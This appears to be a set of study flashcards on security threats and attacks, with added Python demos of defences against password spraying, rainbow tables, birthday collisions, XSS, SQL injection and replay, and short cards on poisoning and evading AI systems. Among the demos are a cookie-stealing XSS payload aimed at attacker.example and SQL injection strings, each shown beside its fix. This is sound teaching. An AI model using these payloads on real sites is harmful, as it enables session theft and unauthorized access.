Threats, Attacks, & Vulnerabilities Flashcards

1
Q

Define

Typosquatting

A

A type of URL hijacking, using a misspelled version of a legitimate website URL

2
Q

Define

Pharming

A
  • Like phishing, but instead of luring individuals it redirects large groups of users to a fake site at once
  • Often utilizes a poisoned DNS server or client vulnerabilities (e.g. a modified hosts file) so that the legitimate URL resolves to the attacker's site
  • Relatively rare, but they do occur
3
Q

Define

Vishing

A
  • Voice phishing, done over phone or voicemail
  • Caller ID spoofing is common
4
Q

Define

Smishing

A
  • SMS phishing, performed via text message
  • Spoofing of the sender's number / sender ID is common
5
Q

Define

Spear phishing

A
  • Targeted phishing attacks, going after a very specific person or group
  • Utilize inside information, or public information gathered through reconnaissance, to make the attack more believable
6
Q

Define

Whaling

A
  • A spear phishing attack with a large target such as a CEO or CFO
  • Typically for the purpose of getting funds from someone with access to a large bank account
7
Q

Define

Dumpster Diving

A

• Gather personal details by going through trash, to use for phishing attacks and impersonation

8
Q

How to Protect against Dumpster Diving?

A
  • Shred or burn your documents
  • Secure your garbage
9
Q

Define

Shoulder Surfing

A
  • Looking over someone’s shoulder to view private information, passwords, etc.
  • Can be done from a distance using binoculars, telescopes, webcam monitoring
10
Q

How to protect against Shoulder Surfing?

A
  • Be aware of surroundings
  • Use privacy filter (screen that blocks view from angles)
  • Keep monitor facing away from windows, hallways
  • Don’t do sensitive work in public area
11
Q

Define

Watering Hole Attack

A
  • When you can’t attack an organization directly, you can attack a third-party that is associated with them.
  • The third party is termed the “watering hole.”
  • Ex, hijack a website that the victim uses.
  • The attack is looking for specific victims, but often all visitors of the watering hole are infected / attacked.
12
Q

How to protect against a Watering Hole Attack?

A
  • Make sure your own defenses are very good
  • Use a multi-layered defense
13
Q

Define

SPIM

A

Spam over Instant Messaging

14
Q

Define

Spam

A
  • Unsolicited messages, typically over email or on forums, etc.
  • Can be malicious, but not necessarily so.
  • Includes commercial advertising, non-commercial proselytizing, as well as malicious attacks like phishing
15
Q

What are the problems caused by spam?

A
  • Security concerns
  • resource utilization
  • storage costs
  • management of spam
16
Q

How to protect against spam?

A
  • It is necessary to combine multiple approaches.
  • Mail gateways / filters
  • Utilize Allow lists
  • SMTP standards checking (blocking anything not following RFC standards)
  • rDNS check
  • Tarpitting
  • Recipient filtering
17
Q

Define

Recipient Filtering

A

Blocking all email not addressed to a valid recipient

18
Q

Define

rDNS

A
  • Reverse DNS
  • Looks up the PTR record for the sending IP address and checks that it resolves to a hostname consistent with the sender's claimed domain (and, ideally, that the hostname resolves back to the same IP)
  • Mail from IPs with no or mismatched reverse DNS is commonly rejected, since spam bots rarely have it set up
19
Q

Define

Tarpitting

A
  • Intentionally slowing down server performance to slow down / mitigate an attack
  • Ex. slow delivery of e-mail to prevent mass mailed spam, so the spammers move on from you
20
Q

Define

Tailgating

A
  • Following an authorized person through a controlled door to gain unauthorized access to a building
  • May involve social engineering, such as walking in with your hands full or posing as a third-party vendor, so that the authorized person holds the door
21
Q

How to protect against tailgating?

A
  • A no-tailgating policy
  • Policy that all visitors must wear badges
  • Mechanically prevent more than one person from entering at a time, such as a turnstile, an access control vestibule (mantrap), or an airlock-style double door
22
Q

What are some principles of social engineering?

A
  • Authority
  • Intimidation
  • Scarcity
  • Urgency
  • Consensus / social proof
  • Familiarity / Liking
  • Trust
23
Q

Define

Virus

A
  • Malware that can reproduce itself
  • Requires human interaction to execute
24
Q

Define

Worm

A

Self-replicating malware that spreads from machine to machine over the network, typically by exploiting a vulnerability, without requiring any human interaction

25
Q

Describe some virus types

A
  • Program virus: part of an application
  • Boot sector virus: runs when the system boots
  • Script virus: can be operating-system or browser-based
  • Macro virus: common in Microsoft Office documents
26
Q

How to protect against ransomware?

A
  • Always have a backup, ideally offline and disconnected
  • Keep the OS and applications up-to-date
  • Keep anti-virus / anti-malware signatures up-to-date
  • Keep everything up-to-date
27
Q

Difference between ransomware and crypto-malware?

A
  • Ransomware does not necessarily encrypt your files; it is any malware that demands payment to remove it or to restore access
  • Crypto-malware, which encrypts your files, is the most common form of ransomware today
  • In practice the term ransomware is therefore usually used to mean crypto-malware
28
Q

Define

Trojan horse

A
  • Software that pretends to be something else (a legitimate program) so that the user runs it
  • Not primarily concerned with replicating itself
29
Q

Define

Fileless Virus

A
  • Runs only in memory; writes no executable file to disk
  • That makes it difficult for file-scanning anti-virus to detect
  • Might still add a registry entry (for example an autostart key that launches a script) so it can run again after a reboot
30
Q

Examples of a PUP?

A
  • Potentially Unwanted Program
  • Browser toolbar
  • Backup utility that displays ads
  • Browser search engine hijacker
31
Q

Define

RAT

A
  • Remote Access Trojan
  • aka Remote Administration Tool
  • A tool that gives administrative access to a remote user
32
Q

How to protect against RATs?

A
  • Don't run unknown software
  • Don't follow unknown links
  • Keep anti-virus / OS / applications up-to-date
  • Always have a backup
33
Q

Define

Rootkit

A
  • Modifies core system files or the kernel itself, becoming part of the operating system
  • Can therefore hide from the OS; won't be seen in Task Manager
  • Thus invisible to traditional anti-virus utilities
  • Very difficult to remove even if discovered, because it is now part of the operating system
34
Q

How to protect against Rootkits?

A
  • Use a remover that is specific to the rootkit; these are usually developed after a rootkit is discovered
  • Use Secure Boot on UEFI
35
Q

Define

Secure Boot

A
  • A feature of UEFI firmware
  • Checks the digital signatures of the bootloader, kernel, and boot-time drivers against keys stored in the firmware
  • Will not boot a system whose boot components are unsigned or have been modified, or an OS that does not support Secure Boot
36
Q

Define

Bot

A
  • Malware that infects a machine for purposes of automation
  • Receives instructions from a Command and Control server
  • May make your machine participate in attacks, etc.
37
Q

Define

C&C

A
  • Command and Control
  • The server that controls bots / botnets
38
Q

Define

Botnet

A
  • A group of bots working together under common control
39
Q

What are botnets often used for?

A
  • DDoS attacks
  • Relaying spam
  • Proxying network traffic
  • Various distributed computing tasks
  • That computing power may be rented out (DDoS as a Service)
40
Q

How to protect against bots?

A
  • Prevent initial infection by keeping up-to-date, not downloading unknown things, etc.
  • Network monitoring
  • Use a firewall to block C&C communications
41
Q

Define

Logic Bomb

A
  • Something left on a system that waits for a predefined event
  • Can be triggered by a date/time, a user action, a system event, etc.
  • Often destroys itself, making it difficult to gather evidence after the attack
42
Q

How to protect against Logic Bombs?

A
  • Each is unique, so there are no predefined signatures; difficult to detect
  • Processes and procedures are a good strategy
  • Formal change control: all modifications must be documented; undocumented changes trigger an investigation
  • Monitoring that alerts on changes
  • Host-based intrusion detection
  • File integrity monitoring applications such as Tripwire
  • Constant auditing
43
Q

Define

Spraying Attack

A
  • Trying a small number of very common passwords against a multitude of accounts
  • Avoids locking any account by trying only a few passwords per account (staying below the lockout threshold) before moving on
  • Rarely triggers lockouts or per-account alerts, so detection has to look across accounts, e.g. many different usernames failing from one source address
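The detection point above (per-account lockout counters never fire, so the detection has to key on the source rather than the account) is easy to miss in practice. The following is an added example, not part of the original flashcards, that runs a spray-versus-brute-force classifier over constructed authentication log lines. The log format, thresholds, and IP addresses are assumptions for the demonstration:

```python
"""Password-spraying detection over sample authentication log lines.

Spraying looks like: one source, MANY distinct accounts, FEW attempts each
(always below the lockout threshold).  Brute force is the inverse: one
account, many attempts.  Per-account lockout counters miss spraying, so the
detection keys on the source address instead.
"""
from collections import defaultdict

# Constructed sample log lines (not from a real system):
# <time> <user> <source ip> <result>
SAMPLE_LOG = """\
08:00:01 alice 203.0.113.9 FAIL
08:00:02 bob 203.0.113.9 FAIL
08:00:03 carol 203.0.113.9 FAIL
08:00:04 dave 203.0.113.9 FAIL
08:00:05 erin 203.0.113.9 FAIL
08:00:06 frank 203.0.113.9 FAIL
08:00:07 grace 203.0.113.9 OK
08:01:00 alice 198.51.100.7 FAIL
08:01:01 alice 198.51.100.7 FAIL
08:01:02 alice 198.51.100.7 FAIL
08:01:03 alice 198.51.100.7 FAIL
08:01:04 alice 198.51.100.7 FAIL
08:01:05 alice 198.51.100.7 FAIL
08:02:00 bob 192.0.2.44 FAIL
08:02:30 bob 192.0.2.44 OK
"""


def parse_log(text):
    """Yield (user, src_ip, success) tuples from the constructed format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        _time, user, src, result = line.split()
        yield user, src, result == "OK"


def classify_sources(text, lockout_threshold=5, spray_min_accounts=5):
    """Return {src_ip: "spray" | "brute_force" | "normal"}.

    brute_force: some single user reached the lockout threshold from this source.
    spray:       failures against >= spray_min_accounts distinct users, with
                 every user kept below the lockout threshold (the sprayer's goal).
    """
    failures = defaultdict(lambda: defaultdict(int))   # src -> user -> fail count
    for user, src, ok in parse_log(text):
        if not ok:
            failures[src][user] += 1

    verdict = {}
    for src, per_user in failures.items():
        max_per_user = max(per_user.values())
        if max_per_user >= lockout_threshold:
            verdict[src] = "brute_force"
        elif len(per_user) >= spray_min_accounts:
            verdict[src] = "spray"
        else:
            verdict[src] = "normal"
    return verdict


if __name__ == "__main__":
    for src, kind in sorted(classify_sources(SAMPLE_LOG).items()):
        print(f"{src:15} {kind}")
```

The spraying source never has more than one failure per account, so a lockout policy of five attempts does nothing against it; only the count of distinct accounts per source gives it away. In a real SIEM the same logic would be applied over a sliding time window and the source key might be a user agent or ASN rather than a single IP, since sprayers rotate addresses.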
44
Q

Define

Brute Force Attack

A
  • Try every possible password combination until the right one is matched
  • Can take a very long time, especially if a strong (deliberately slow) hashing algorithm is used
  • Requires a large amount of processing power
  • When performed online against the login system, it usually results in account lockouts
45
Q

Define

Offline Brute Force Attack

A
  • When an attacker has obtained a hashed password, they can hash guessed passwords and see if the hashes match; a match means the password has been guessed
  • Does not result in an account lockout or any alerts, because the attack is not performed against the login system
46
Q

Define

Dictionary Attack

A
  • Similar to brute force, but uses common words and known passwords rather than every possible combination of characters
  • Password crackers may also apply common letter substitutions, e.g. p@$$w0rd
  • Far faster than exhaustive brute force, but still slow against a long passphrase or a slow hash
47
Q

Define

Rainbow Table

A
  • An optimized, pre-built set of hashes
  • Contains pre-calculated hash chains (trading storage for computation)
  • Allows you to look up password hashes without computing hashes of guessed passwords at attack time
  • Only works against unsalted hashes, since the table must be built for the exact hashing scheme in use
48
Q

Define

Salt

A
  • Random data added to a password when hashing
  • Every user gets their own unique salt, so hashes are unique even if passwords are the same
  • A type of cryptographic nonce
49
Q

Where is a password's Salt information stored?

A
  • It is commonly stored alongside the password hash; it is not a secret
50
Q

What does the use of Salt protect against?

A
  • It prevents the use of rainbow tables, since a table would have to be built separately for every salt value
  • Does not stop a brute force or dictionary attack, but slows it down: each user's hash must be attacked separately instead of cracking every user in one pass
  • Because the salt is stored with the hash, an attacker who steals the password database also gets the salt; the salt's job is to remove precomputation and cross-user reuse, not to keep the hash secret
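To make cards 47 through 50 concrete, here is an added example (not from the original flashcards) that hashes the same password for two users with and without a salt, builds a toy precomputed lookup table, and shows that the table cracks the unsalted hash but not the salted one. It uses the standard library's `hashlib.pbkdf2_hmac`; the iteration count is an assumption kept low so the demo runs instantly:

```python
"""Salted vs. unsalted password hashing, and why precomputed tables fail."""
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 10_000   # low for the demo; production should use far more


def hash_unsalted(password: str) -> bytes:
    """Deterministic: identical passwords give identical hashes (bad)."""
    return hashlib.sha256(password.encode()).digest()


def hash_salted(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, hash). A fresh random 16-byte salt per user by default."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_salted(password: str, salt: bytes, stored: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, digest = hash_salted(password, salt)
    return hmac.compare_digest(digest, stored)


def precomputed_table(candidates):
    """Attacker's lookup table, unsalted hash -> plaintext (a toy rainbow table)."""
    return {hash_unsalted(p): p for p in candidates}


def crack_with_table(stored: bytes, table) -> Optional[str]:
    """One dictionary lookup; no hashing at attack time."""
    return table.get(stored)


def demo():
    common = ["password", "123456", "letmein", "qwerty", "Summer2024"]  # constructed
    table = precomputed_table(common)

    # Two users who chose the same password.
    u1 = hash_unsalted("letmein")
    u2 = hash_unsalted("letmein")
    s1, h1 = hash_salted("letmein")
    s2, h2 = hash_salted("letmein")

    return {
        "unsalted_identical": u1 == u2,                      # leaks shared passwords
        "salted_identical": h1 == h2,                        # different salts
        "table_cracks_unsalted": crack_with_table(u1, table),
        "table_cracks_salted": crack_with_table(h1, table),  # table is useless
        "verify_ok": verify_salted("letmein", s1, h1),
        "verify_wrong": verify_salted("letmein1", s1, h1),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:24} {v!r}")
```

Note that `verify_salted` needs the salt, which is exactly why it is stored next to the hash: the salt buys nothing by being secret, it buys uniqueness. An attacker with the database still has to run PBKDF2 for every guess against every user, which is the slowdown card 50 describes.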
51
Q

Define

Malicious USB Cable

A
  • Looks like a normal USB cable / charger, but has additional electronics inside
  • When a victim plugs it into a computer, it runs malicious software
52
Q

Define

Malicious USB flash drive

A
  • Looks like a normal USB thumb drive / flash drive, but has additional electronics inside
  • When a victim plugs it into a computer, it runs malicious software
  • Attackers may leave flash drives on tables or on the ground, knowing curious people will plug them in to see what's on them
53
Q

How do malicious USB cables / drives initiate malicious software?

A
  1. Auto-Run: Older operating systems would automatically run files on USB devices; in modern systems this is disabled or removed by default
  2. HID: The device can still present itself as an HID (Human Interface Device) and behave as a keyboard and/or mouse, typing pre-programmed input such as launching a command prompt and running commands
  3. Files: The flash drive may simply contain malicious files and malware that infect the system once the user opens them
  4. Boot Device: If configured as a boot device, and the victim leaves it inserted when they reboot, the computer may boot from the malicious USB, which can then infect the system
  5. Wireless network adapter: Can connect the device to another network, redirect or modify Internet traffic, act as a wireless gateway for other devices, etc.
54
Q

Define

HID

A
  • Human Interface Device
  • Examples: keyboard, mouse
55
Q

Define

Skimming

A
  • Stealing credit card information, usually during a normal transaction
  • Can be skimmed from the card itself (the magnetic stripe) or from the terminal it interacts with
56
Q

Define

ATM Skimming

A
  • An additional step of a skimming attack: a small camera is added to the environment to record your PIN entry
57
Q

Define

Card Cloning

A
  • Creating a duplicate of a credit card using information obtained from a skimmer
  • The cloned card can only be used for magnetic-stripe transactions, because the EMV chip's secrets cannot be read and copied by a skimmer
  • Common for gift cards, which don't utilize a chip
58
Q

Define "Poisoning the training data"

A
  • An attack on machine learning / AI
  • Attackers feed modified training data into the model to confuse it or cause it to behave incorrectly
  • An AI is only as good as its training process
59
Q

Define

Evasion Attack

A
  • Finding limitations in an AI system in order to circumvent it
  • Since the AI is trained on specific criteria, it can be fooled if attackers change their approach to something the training did not cover
60
Q

How to protect against attacks on AI / machine learning?

A
  • Check the training data to verify its contents
  • Constantly retrain with new data, more data, better data
  • Train the model to recognize potential poisoned data and evasion attempts
61
Q

Define

Supply Chain

A
  • All steps in the process from raw materials to end user
  • Includes raw materials, suppliers, manufacturers, distributors, customers, consumers
62
Q

Define

Supply Chain Attack

A
  • Attacking a target by going after another vendor in their supply chain
  • Ex., if an HVAC vendor has VPN access to a target's network, attack the vendor to exploit that access
  • Ex., put malicious code or hardware into a device that is being sold down the supply chain
  • One exploit can affect every customer downstream in the chain
63
Q

On-Premises vs. In-Cloud Security: List PROS of ON PREM

A
  • Full control of security
  • Local on-site IT can manage more attentively
  • System checks can occur at any time
  • Don't need to call an outside team for support
64
Q

On-Premises vs. In-Cloud Security: List CONS of ON PREM

A
  • A local team can be expensive and difficult to staff
  • Security changes can take time: new equipment, configurations, and additional costs
65
Q

On-Premises vs. In-Cloud Security: List PROS of IN-CLOUD

A
  • Data is in a provider-managed environment with strict physical access controls
  • Automated security updates
  • Fault tolerance and redundancy lead to limited downtime and higher availability
  • One-click deployments
66
Q

On-Premises vs. In-Cloud Security: List CONS of IN-CLOUD

A
  • Third parties may have access to your data
  • Users must still be trained to follow security best practices
  • May not be as customizable
67
Q

Define

Birthday Attack

A
  • A type of cryptographic attack on hash functions
  • The attacker generates many variants of plaintexts (for example two documents, one benign and one malicious, each with many harmless variations) looking for two that produce the same hash
  • i.e., try to find a collision through brute force
  • Named for the birthday paradox: in a group of only 23 people there is a better than even chance that two share a birthday. Likewise, among N-bit hashes a collision becomes likely after about 2^(N/2) attempts, far fewer than the 2^N needed to match one specific hash
  • Once a collision is found, a signature or certificate issued for the benign version is equally valid for the malicious one
68
Q

Define

Collision

A
  • In cryptography, a collision is when two different inputs have the same hash value
69
Q

How to protect against a Birthday Attack?

A
  • Use a hash with a large output size so that 2^(N/2) attempts is infeasible (SHA-256, for example, gives about 2^128 work)
  • Do not use hashes with known practical collisions, such as MD5 and SHA-1, for signatures or certificates
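The 2^(N/2) figure in cards 67 and 69 is easy to state and easy to forget. The following added example (not part of the original flashcards) runs a real birthday-style collision search against SHA-256 truncated to a small number of bits, and compares the attempts needed with the birthday bound and with the full 2^N space a preimage search would face. The truncation and the message format are assumptions made so the search finishes in well under a second:

```python
"""Birthday attack on a truncated hash.

Collision search: hash distinct messages until two of them share the same
n-bit digest.  By the birthday paradox this takes roughly 2**(n/2) attempts,
not 2**n, which is why digest length matters.  SHA-256 is truncated here
purely so the search completes quickly; the mathematics is the same.
"""
import hashlib
import math


def truncated_hash(data: bytes, bits: int) -> int:
    """First `bits` bits of SHA-256(data), as an integer."""
    full = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return full >> (256 - bits)


def find_collision(bits: int, max_attempts: int = 1 << 24):
    """Return (attempts, msg_a, msg_b): msg_a != msg_b with equal digests.

    The attacker keeps every digest seen so far; the first repeat is the
    collision.  Memory grows with the number of attempts, which is why real
    attacks use cycle-finding (Floyd / rho) instead of a dictionary.
    """
    seen = {}
    for i in range(max_attempts):
        msg = f"document-{i}".encode()      # constructed distinct inputs
        h = truncated_hash(msg, bits)
        if h in seen:
            return i + 1, seen[h], msg
        seen[h] = msg
    return None


def birthday_bound(bits: int) -> float:
    """Expected attempts until the first collision: sqrt(pi/2 * 2**bits)."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


if __name__ == "__main__":
    for bits in (16, 24, 32):
        attempts, a, b = find_collision(bits)
        assert a != b and truncated_hash(a, bits) == truncated_hash(b, bits)
        print(f"{bits:2d}-bit digest: collision after {attempts:7d} attempts "
              f"(expected ~{birthday_bound(bits):.0f}, "
              f"preimage space {2 ** bits})")
```

For a 32-bit digest the collision appears after roughly 80,000 hashes, while finding a message that matches one given 32-bit digest would take on the order of 4 billion. Scaling up, a 128-bit digest (MD5's size) gives only about 2^64 collision work, which is why MD5 and SHA-1 are no longer acceptable for signatures, and why card 69's answer is to use a larger output.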
70
Q

What is a Downgrade Attack?

A
  • An attacker forces systems to downgrade their security to an older protocol version or a weaker form of encryption that is more vulnerable
  • May be performed by influencing / intercepting the initial negotiation in which the protocol version and cipher suite are chosen
71
Q

How to protect against Downgrade Attacks?

A
  • Do not allow a fallback to lower protocol versions or ciphers that are known to be vulnerable; disable them on both client and server
72
Q

Define

Privilege Escalation

A
  • Gaining higher-level access to a system
  • Through exploiting a vulnerability, bug, misconfiguration, or design flaw
  • Typically used to reach the root or administrator account
73
Q

Define

Horizontal Privilege Escalation

A
  • Using access to one account to gain access to a different account at the same level
  • Unlike vertical privilege escalation, the access is not necessarily higher, just different
74
Q

How to protect against Privilege Escalation?

A
  • Ensure all systems are patched
  • Keep AV software updated
  • Utilize Data Execution Prevention
  • Utilize Address Space Layout Randomization
75
Q

Define

Data Execution Prevention

A
  • A safeguard in the operating system, backed by the CPU's no-execute (NX / XD) bit
  • Marks memory regions that hold data, such as the stack and heap, as non-executable
  • Code may only run from regions marked executable
  • If an attacker injects code into a data region (e.g. via a buffer overflow) and tries to run it, the CPU faults and the process is terminated
76
Q

Define

Address Space Layout Randomization

A
  • A safeguard in the operating system
  • Randomizes the base addresses of the stack, heap, libraries, and executable each time a program runs
  • If an attacker finds a useful memory address on one system, they cannot rely on it being the same on another system, or even on the next run
  • Makes exploiting a buffer overflow much harder, because the attacker cannot jump to a known address
77
Q

What are the legalities around Dumpster Diving?

A
  • Varies between countries
  • In the US, it is LEGAL to go through someone else's trash once it has been put out for collection; nobody owns trash
  • However, you cannot break the law in order to gain access to the trash (e.g. if it is on private property with No Trespassing signs)
78
Q

Define

XSS

A
  • Cross-Site Scripting
  • The name comes from its original association with browser security flaws, where information from one site could be shared with another
  • A common vulnerability in web-based applications
  • (Not to be confused with Cascading Style Sheets / CSS)
79
Q

Define

Non-Persistent XSS Attack

A
  • If a website reflects user input (such as a search term) back into the page without encoding it, it is vulnerable to this type of attack
  • An attacker e-mails the victim a link to the site that carries a script in the input
  • Once clicked, the site echoes the script into the page and it executes in the victim's browser as if it came from the server
  • The script usually sends data such as session cookies or credentials to the attacker, or performs actions as the victim
80
Q

"Reflected XSS Attack" is also known as?

A
  • Another name for a Non-Persistent XSS Attack
81
Q

Define

Persistent XSS Attack

A
  • An XSS attack where the embedded code is permanently stored on the server, such as in a social media post
  • Everyone who views the page receives the payload and runs the script, without requiring a special link
82
Q

"Stored XSS Attack" is also known as?

A
  • Another name for a Persistent XSS Attack
83
Q

How to protect against XSS?

A
  • Never click an untrusted link
  • Consider disabling JavaScript, or control when it is enabled
  • Keep browsers and applications updated
  • Developers: validate input, and encode all user-supplied data when it is written into HTML (output encoding) so the browser treats it as text rather than markup; a Content Security Policy adds a further layer
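The developer-side fix in card 83 is output encoding, and the difference between the vulnerable and hardened versions is a single function call. The following added example (not part of the original flashcards) renders a search-results page the way a reflected-XSS-vulnerable server would, then the way a correct one does, using the standard library's `html.escape`. The payload and the page template are constructed for the demonstration:

```python
"""Reflected XSS: the vulnerable rendering beside the hardened one.

The page reflects a user-supplied search term.  Without output encoding the
browser treats the term as markup; with html.escape it is rendered as text.
"""
import html

# Constructed attacker payload of the kind carried in a reflected-XSS link:
# exfiltrates the cookie by loading an image from an attacker host.
PAYLOAD = ("<script>new Image().src='https://attacker.example/?c='"
           "+document.cookie</script>")


def render_vulnerable(query: str) -> str:
    """String concatenation: user input becomes part of the HTML."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Encode for the HTML text context. quote=True also escapes " and '."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_attribute_safe(query: str) -> str:
    """Reflecting into an attribute: encode AND keep the attribute quoted,
    otherwise a value like  " autofocus onfocus="alert(1)  breaks out."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'


def contains_script_tag(rendered: str) -> bool:
    """What the browser would act on: a literal <script ...> in the markup."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(render_attribute_safe('" autofocus onfocus="alert(1)'))
```

Input validation alone is not enough here: a search term legitimately may contain `<` or quotes. Encoding at the point of output is what keeps the data in the text context the developer intended. Note that the right encoder depends on context; the HTML-attribute case above only works because the attribute value is quoted, and data written into JavaScript or a URL needs a different encoding again.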
84
Q

Define

Code Injection

A
  • Adding your own data or commands to a data stream that the application then interprets as code or query syntax
  • Should never be possible, but applications are often vulnerable due to bad programming, typically building a command or query by string concatenation with user input
85
Q

What are common data types used in Code Injection?

A
  • HTML injection
  • SQL injection
  • XML injection
  • LDAP injection
  • DLL injection
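SQL injection is the canonical case of the "data treated as query syntax" problem card 84 describes. The following added example (not part of the original flashcards) sets up an in-memory SQLite database with constructed rows and shows a login query built by string formatting beside the same query using parameter placeholders; the classic `' OR '1'='1` and comment-based payloads succeed against the first and do nothing against the second:

```python
"""SQL injection: string-built query beside a parameterized one."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data; an in-memory database, nothing touches disk."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse", "admin"),
        ("bob", "hunter2", "user"),
    ])
    return conn


def login_vulnerable(conn, name, password):
    """User input is spliced into the SQL text, so input can rewrite the query."""
    sql = (f"SELECT name, role FROM users "
           f"WHERE name = '{name}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, name, password):
    """Placeholders: the driver passes values separately from the SQL text,
    so they can never be parsed as SQL, whatever characters they contain."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


# Constructed payloads.
TAUTOLOGY = "' OR '1'='1"     # makes the WHERE clause always true
COMMENT = "alice'--"          # ends the string, comments out the password check


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", login_vulnerable(db, TAUTOLOGY, TAUTOLOGY))
    print("vulnerable, comment:  ", login_vulnerable(db, COMMENT, "anything"))
    print("safe, tautology:      ", login_safe(db, TAUTOLOGY, TAUTOLOGY))
    print("safe, comment:        ", login_safe(db, COMMENT, "anything"))
    print("safe, real creds:     ", login_safe(db, "bob", "hunter2"))
```

With the tautology in both fields the vulnerable query becomes `WHERE name = '' OR '1'='1' AND password = '' OR '1'='1'`, which matches every row; with the comment payload the password check is discarded entirely and alice's admin row comes back. The parameterized version returns nothing for either payload because the quote and `--` are just characters inside a bound value. The same principle (keep data and code on separate channels) is the fix for the LDAP, XML and command injection variants listed in card 85.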
86
Q

Define

Buffer Overflow

A
  • When a write to one section of memory is able to overwrite a different section of memory
  • Overfilling a buffer so that the data spills over into adjacent memory
  • This gives an attacker the ability to modify memory they should not have access to, such as a return address or a variable
  • This should never happen, but an attacker can take advantage of poor programming that does not check sizes
  • Finding one that is repeatable and useful for exploitation is difficult
87
Q

How to avoid a Buffer Overflow

A
  • Developers need to perform bounds checking, ensuring that writes can never exceed the allocated buffer
  • Using memory-safe languages or safe library functions helps; DEP and ASLR reduce the impact of overflows that slip through
88
Q

Define

Replay Attack

A
  • An attacker obtains a copy of information transmitted over the network
  • May be done via a network tap, ARP poisoning, or malware on the victim's computer
  • This information can be re-sent (replayed) by the attacker to pose as the victim
89
Q

Define

Pass the Hash

A
  • A type of replay attack
  • The attacker obtains a user's password hash, for example by sniffing authentication traffic that carries it, or by extracting it from a compromised machine's memory or credential store
  • Some authentication protocols (notably Windows NTLM) use the hash itself as the credential, so the attacker can present that same hash to the server and appear to know the password, without ever cracking it
90
Q

How to protect against a Pass the Hash attack?

A
  • Always use a secured connection to the server (TLS) so that intercepted authentication traffic is encrypted
  • Servers should use a challenge-response exchange that includes a fresh random value (a nonce or session ID) in every login, so the authentication data differs each time and a captured value cannot be replayed
  • Protect the stored hashes themselves: limit where privileged accounts log on so their hashes do not end up in memory on untrusted machines
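Cards 88 through 90 turn on one idea: a credential that looks the same every time can be captured and re-sent, and a fresh per-login nonce is what stops that. The following added example (not part of the original flashcards, and not a real protocol) simulates both sides in one process. A naive server accepts a fixed token and is replayable; a challenge-response server issues a random nonce per login and rejects the captured pair the second time. The shared secret and message layout are assumptions:

```python
"""Replay attack against a static credential, and the nonce-based
challenge-response that defeats it.  Client and server run in-process; the
'captured' values are exactly what an on-path attacker could record."""
import hashlib
import hmac
import os

# What both sides share: a derived key, standing in for a stored password hash.
SECRET = hashlib.sha256(b"correct horse").digest()


class NaiveServer:
    """Accepts a fixed token = HMAC(secret, username).  Same bytes every
    login, so one capture is enough to impersonate the user forever."""

    def expected(self, user: str) -> bytes:
        return hmac.new(SECRET, user.encode(), "sha256").digest()

    def login(self, user: str, token: bytes) -> bool:
        return hmac.compare_digest(token, self.expected(user))


class ChallengeServer:
    """Issues a fresh random nonce per login; the response is bound to it
    and each nonce is accepted exactly once."""

    def __init__(self):
        self.outstanding = set()

    def challenge(self) -> bytes:
        nonce = os.urandom(16)
        self.outstanding.add(nonce)
        return nonce

    def login(self, user: str, nonce: bytes, response: bytes) -> bool:
        if nonce not in self.outstanding:       # unknown, or already consumed
            return False
        self.outstanding.discard(nonce)         # single use
        expected = hmac.new(SECRET, nonce + user.encode(), "sha256").digest()
        return hmac.compare_digest(response, expected)


def client_response(nonce: bytes, user: str) -> bytes:
    """The legitimate client proves knowledge of SECRET without sending it."""
    return hmac.new(SECRET, nonce + user.encode(), "sha256").digest()


def replay_against_naive():
    srv = NaiveServer()
    captured = srv.expected("alice")            # what the client sent; sniffed once
    return srv.login("alice", captured), srv.login("alice", captured)


def replay_against_challenge():
    srv = ChallengeServer()
    nonce = srv.challenge()
    resp = client_response(nonce, "alice")      # attacker records (nonce, resp)
    first = srv.login("alice", nonce, resp)     # legitimate login succeeds
    replay = srv.login("alice", nonce, resp)    # same pair again: rejected
    fresh = srv.challenge()                     # attacker cannot answer a new
    forged = srv.login("alice", fresh, resp)    # challenge without SECRET
    return first, replay, forged


if __name__ == "__main__":
    print("naive server:     first, replay =", replay_against_naive())
    print("challenge server: first, replay, forged =", replay_against_challenge())
```

The caveat that makes this a pass-the-hash lesson rather than just a replay lesson: the challenge-response server is only as safe as `SECRET`. If the attacker steals that stored value (from a credential database or from memory on a compromised host), they can compute valid responses to any challenge, which is exactly what pass the hash does against NTLM. The nonce defeats capture of the wire traffic; protecting the stored hash is a separate control, which is why card 90 lists both.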
91
Q

Define

Sidejacking

A
  • A name for session hijacking, typically by sniffing the session cookie from unencrypted traffic (for example on open Wi-Fi)
  • If an attacker learns your session ID, they can use it to take over / pose as your session, even from a different location and system
  • With the session ID, the attacker does not need to authenticate with a username and password
92
Q

Define

Cross-Site Request

A
  • When a page on one website causes the browser to request content from another web server
  • Common and usually perfectly legitimate
  • Ex. embedding a YouTube video or Instagram photos on another web page
93
Q

What does this stand for? XSRF

A
  • Cross-Site Request Forgery
94
Q

What does this stand for? CSRF

A
  • Cross-Site Request Forgery | pronounced "sea-surf"
95
Q

Define

One-Click Attack

A
  • Another term for a Cross-Site Request Forgery
96
Q

Session Riding is also known as?

A
  • Another term for a Cross-Site Request Forgery
97
Q

Define

Cross-Site Request Forgery

A
